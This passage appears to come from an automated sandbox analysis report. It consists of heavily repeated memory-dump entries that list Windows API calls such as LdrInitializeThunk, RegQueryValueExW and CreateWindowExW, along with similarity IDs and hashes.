                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )DA(
                                                                                          • API String ID: 0-1463471114
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )DA(
                                                                                          • API String ID: 0-1463471114
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x*:U
                                                                                          • API String ID: 0-2227040091
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x*:U
                                                                                          • API String ID: 0-2227040091
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Executed Functions

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C10
                                                                                          • GetCurrentThread.KERNEL32 ref: 02806C4D
                                                                                          • GetCurrentProcess.KERNEL32 ref: 02806C8A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02806CE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          • Opcode ID: 8c015e41dd694e8125cafb9581eb59a6f9ad872866b586ca3a9bc5a08de1991e
                                                                                          • Instruction ID: 5adf023df52012eebbed28112f695a1fe500fd81da65fd1cc413661518196922
                                                                                          • Opcode Fuzzy Hash: 8c015e41dd694e8125cafb9581eb59a6f9ad872866b586ca3a9bc5a08de1991e
                                                                                          • Instruction Fuzzy Hash: 450207B4A0821CCFCB24DB34D9946ADB7B6BF88305F2090EAD609A7340DB359E85CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11896
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11A08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionUser
                                                                                          • String ID:
                                                                                          • API String ID: 6842923-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499780379.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02805302
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02805302
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02807D61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: CallProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2714655100-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00F44A31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 00F44A31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3660427363-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00F447C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 00F447C4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02806E5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02806E5F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 0280BEE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.501370744.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID:
                                                                                          • API String ID: 2118026453-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 00DF0B57
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499780379.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
